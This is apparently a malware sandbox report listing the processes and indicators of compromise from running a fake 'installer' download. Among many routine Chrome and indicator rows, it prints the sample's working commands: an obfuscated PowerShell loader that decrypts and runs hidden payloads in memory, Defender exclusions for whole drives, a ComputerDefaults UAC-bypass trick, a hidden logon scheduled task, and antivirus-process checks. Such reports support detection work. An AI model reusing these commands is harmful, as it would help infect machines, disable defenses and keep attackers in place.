Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

chrome.exe

pid	process
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

chrome.exeBlind.pifITSMAgent.exeITSMAgent.exe

pid	process
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
2992	Blind.pif
2992	Blind.pif
2992	Blind.pif
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2800	ITSMAgent.exe
2800	ITSMAgent.exe
2800	ITSMAgent.exe
2800	ITSMAgent.exe
2800	ITSMAgent.exe
2800	ITSMAgent.exe
2800	ITSMAgent.exe
2800	ITSMAgent.exe
2800	ITSMAgent.exe
2800	ITSMAgent.exe
2800	ITSMAgent.exe

Suspicious use of SetWindowsHookEx 20 IoCs

Processes:

ITSMService.exeITSMAgent.exeITSMAgent.exeITSMAgent.exeITSMAgent.exeITSMAgent.exeOpenWith.exe

pid	process
4216	ITSMService.exe
4216	ITSMService.exe
4216	ITSMService.exe
4216	ITSMService.exe
4216	ITSMService.exe
4216	ITSMService.exe
4216	ITSMService.exe
4216	ITSMService.exe
4216	ITSMService.exe
2516	ITSMAgent.exe
2896	ITSMAgent.exe
4216	ITSMService.exe
2948	ITSMAgent.exe
4216	ITSMService.exe
4216	ITSMService.exe
4216	ITSMService.exe
4216	ITSMService.exe
3432	ITSMAgent.exe
2800	ITSMAgent.exe
5024	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 4412 wrote to memory of 1212	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 1212	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 2388	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 2388	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 2388	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 2388	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 2388	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 2388	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 2388	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 2388	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 2388	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 2388	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 2388	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 2388	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 2388	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 2388	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 2388	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 2388	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 2388	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 2388	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 2388	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 2388	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 2388	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 2388	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 2388	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 2388	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 2388	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 2388	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 2388	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 2388	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 2388	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 2388	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 2388	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 2388	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 2388	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 2388	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 2388	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 2388	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 2388	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 2388	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 1004	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 1004	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 4356	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 4356	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 4356	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 4356	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 4356	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 4356	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 4356	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 4356	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 4356	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 4356	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 4356	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 4356	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 4356	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 4356	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 4356	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 4356	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 4356	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 4356	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 4356	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 4356	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 4356	4412	chrome.exe	chrome.exe
PID 4412 wrote to memory of 4356	4412	chrome.exe	chrome.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3384

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://download.tglobal.cl/
2⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4412

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffab0239758,0x7ffab0239768,0x7ffab0239778
3⤵
PID:1212

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1540 --field-trial-handle=1792,i,16016743397376988291,16300430993662183074,131072 /prefetch:2
3⤵
PID:2388

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2020 --field-trial-handle=1792,i,16016743397376988291,16300430993662183074,131072 /prefetch:8
3⤵
PID:1004

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2076 --field-trial-handle=1792,i,16016743397376988291,16300430993662183074,131072 /prefetch:8
3⤵
PID:4356

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2848 --field-trial-handle=1792,i,16016743397376988291,16300430993662183074,131072 /prefetch:1
3⤵
PID:4068

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2856 --field-trial-handle=1792,i,16016743397376988291,16300430993662183074,131072 /prefetch:1
3⤵
PID:2824

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4548 --field-trial-handle=1792,i,16016743397376988291,16300430993662183074,131072 /prefetch:8
3⤵
PID:2292

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4640 --field-trial-handle=1792,i,16016743397376988291,16300430993662183074,131072 /prefetch:8
3⤵
PID:1852

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=772 --field-trial-handle=1792,i,16016743397376988291,16300430993662183074,131072 /prefetch:1
3⤵
PID:364

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5028 --field-trial-handle=1792,i,16016743397376988291,16300430993662183074,131072 /prefetch:8
3⤵
PID:2848

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5072 --field-trial-handle=1792,i,16016743397376988291,16300430993662183074,131072 /prefetch:1
3⤵
PID:396

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5012 --field-trial-handle=1792,i,16016743397376988291,16300430993662183074,131072 /prefetch:2
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4616

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4688 --field-trial-handle=1792,i,16016743397376988291,16300430993662183074,131072 /prefetch:1
3⤵
PID:3412

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5280 --field-trial-handle=1792,i,16016743397376988291,16300430993662183074,131072 /prefetch:1
3⤵
PID:516

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5300 --field-trial-handle=1792,i,16016743397376988291,16300430993662183074,131072 /prefetch:8
3⤵
PID:1568

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5424 --field-trial-handle=1792,i,16016743397376988291,16300430993662183074,131072 /prefetch:8
3⤵
PID:4724

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5288 --field-trial-handle=1792,i,16016743397376988291,16300430993662183074,131072 /prefetch:1
3⤵
PID:2948

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5236 --field-trial-handle=1792,i,16016743397376988291,16300430993662183074,131072 /prefetch:8
3⤵
PID:2936

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5240 --field-trial-handle=1792,i,16016743397376988291,16300430993662183074,131072 /prefetch:8
3⤵
PID:1880

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\em_6hvuwiqE_installer_Win7-Win11_x86_x64\" -spe -an -ai#7zMap21501:142:7zEvent21241
2⤵
PID:2660

C:\Users\Admin\Downloads\em_6hvuwiqE_installer_Win7-Win11_x86_x64\Setup.exe
"C:\Users\Admin\Downloads\em_6hvuwiqE_installer_Win7-Win11_x86_x64\Setup.exe"
2⤵
- Executes dropped EXE
PID:1460

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k copy Emotions Emotions.cmd & Emotions.cmd & exit
3⤵
PID:2292

C:\Windows\SysWOW64\tasklist.exe
tasklist
4⤵
- Enumerates processes with tasklist
PID:1608

C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
4⤵
PID:3812

C:\Windows\SysWOW64\tasklist.exe
tasklist
4⤵
- Enumerates processes with tasklist
PID:5048

C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
4⤵
PID:1772

C:\Windows\SysWOW64\cmd.exe
cmd /c md 235147
4⤵
PID:4448

C:\Windows\SysWOW64\findstr.exe
findstr /V "MaskBathroomsCompoundInjection" Participants
4⤵
PID:1716

C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Brother + Fiber + Reproductive 235147\Z
4⤵
PID:4168

C:\Users\Admin\AppData\Local\Temp\235147\Blind.pif
235147\Blind.pif 235147\Z
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SendNotifyMessage
PID:2992

C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
4⤵
- Runs ping.exe
PID:5024

C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Downloads\em_6hvuwiqE_installer_Win7-Win11_x86_x64\Installer_x86.64.bat
2⤵
PID:1928

C:\Users\Admin\AppData\Local\Temp\235147\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\235147\RegAsm.exe
2⤵
- Executes dropped EXE
PID:3400

C:\Users\Admin\AppData\Local\Temp\235147\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\235147\RegAsm.exe
2⤵
- Executes dropped EXE
PID:3564

C:\Users\Admin\AppData\Local\Temp\235147\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\235147\RegAsm.exe
2⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:4136

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\em_6hvuwiqE_installer_Win7-Win11_x86_x64\Installer_x86.64.bat"
2⤵
PID:4404

C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
3⤵
PID:3076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sJl2XjZKf8P7tPC5O2PSWiH6SZ3l6PRhIjOOagsFras='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fhDkWQnfS8p4V+IfnbnFyA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $TFrJJ=New-Object System.IO.MemoryStream(,$param_var); $YnvVD=New-Object System.IO.MemoryStream; $ImDpI=New-Object System.IO.Compression.GZipStream($TFrJJ, [IO.Compression.CompressionMode]::Decompress); $ImDpI.CopyTo($YnvVD); $ImDpI.Dispose(); $TFrJJ.Dispose(); $YnvVD.Dispose(); $YnvVD.ToArray();}function execute_function($param_var,$param2_var){ $SAFWT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ptUtT=$SAFWT.EntryPoint; $ptUtT.Invoke($null, $param2_var);}$VaxeO = 'C:\Users\Admin\Downloads\em_6hvuwiqE_installer_Win7-Win11_x86_x64\Installer_x86.64.bat';$host.UI.RawUI.WindowTitle = $VaxeO;$shjSd=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($VaxeO).Split([Environment]::NewLine);foreach ($UeMNZ in $shjSd) { if ($UeMNZ.StartsWith('IJHdbaJyZGSbGkOhEMiD')) { $MDHMQ=$UeMNZ.Substring(20); break; }}$payloads_var=[string[]]$MDHMQ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
3⤵
PID:2216

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2688

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:396

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"
4⤵
PID:3584

C:\Windows \System32\ComputerDefaults.exe
"C:\Windows \System32\ComputerDefaults.exe"
5⤵
- Executes dropped EXE
PID:4392

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q
4⤵
PID:1624

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\Downloads\em_6hvuwiqE_installer_Win7-Win11_x86_x64\Installer_x86.64')
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2692

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4892

C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\em_6hvuwiqE_installer_Win7-Win11_x86_x64\em_6hvuwiqE_installer_Win7-Win11_x86_x64.msi"
2⤵
- Blocklisted process makes network request
- Enumerates connected drives
PID:4700

C:\Users\Admin\Downloads\em_6hvuwiqE_installer_Win7-Win11_x86_x64\bin\Debug\MusicPlayerApp.exe
"C:\Users\Admin\Downloads\em_6hvuwiqE_installer_Win7-Win11_x86_x64\bin\Debug\MusicPlayerApp.exe"
2⤵
- Executes dropped EXE
- Enumerates connected drives
PID:404

C:\Users\Admin\Downloads\em_6hvuwiqE_installer_Win7-Win11_x86_x64\obj\Debug\MusicPlayerApp.exe
"C:\Users\Admin\Downloads\em_6hvuwiqE_installer_Win7-Win11_x86_x64\obj\Debug\MusicPlayerApp.exe"
2⤵
- Executes dropped EXE
- Enumerates connected drives
PID:4716

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:4616

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2688

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Adds Run key to start application
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:4564

C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
2⤵
PID:2380

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 347DF2AACFD8767C70A650F47BBCDAC3
2⤵
- Loads dropped DLL
PID:2476

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 2275A5880E4551D60954B768F18A207B E Global\MSI0000
2⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:2904

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C "cd "C:\Program Files (x86)\ITarian\Endpoint Manager\" && "C:\Program Files (x86)\ITarian\Endpoint Manager\python_x86_Lib.exe" "
3⤵
PID:304

C:\Program Files (x86)\ITarian\Endpoint Manager\python_x86_Lib.exe
"C:\Program Files (x86)\ITarian\Endpoint Manager\python_x86_Lib.exe"
4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:1104

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
5⤵
PID:1384

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:4640

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:1076

C:\Program Files (x86)\ITarian\Endpoint Manager\ITSMService.exe
"C:\Program Files (x86)\ITarian\Endpoint Manager\ITSMService.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks for any installed AV software in registry
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4216

C:\Program Files (x86)\ITarian\Endpoint Manager\ITSMAgent.exe
"C:\Program Files (x86)\ITarian\Endpoint Manager\ITSMAgent.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2516

C:\Program Files (x86)\ITarian\Endpoint Manager\ITSMAgent.exe
"C:\Program Files (x86)\ITarian\Endpoint Manager\ITSMAgent.exe" noui
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2896

C:\Program Files (x86)\ITarian\Endpoint Manager\ITSMAgent.exe
"C:\Program Files (x86)\ITarian\Endpoint Manager\ITSMAgent.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2948

C:\Program Files (x86)\ITarian\Endpoint Manager\RmmService.exe
"C:\Program Files (x86)\ITarian\Endpoint Manager\RmmService.exe" --start
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1388

C:\Program Files (x86)\ITarian\Endpoint Manager\ITSMAgent.exe
"C:\Program Files (x86)\ITarian\Endpoint Manager\ITSMAgent.exe" noui
2⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3432

C:\Program Files (x86)\ITarian\Endpoint Manager\ITSMAgent.exe
"C:\Program Files (x86)\ITarian\Endpoint Manager\ITSMAgent.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2800

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:2816

C:\Program Files (x86)\ITarian\Endpoint Manager\RmmService.exe
"C:\Program Files (x86)\ITarian\Endpoint Manager\RmmService.exe"
1⤵
- Executes dropped EXE
PID:4560

C:\Windows\system32\OpenWith.exe
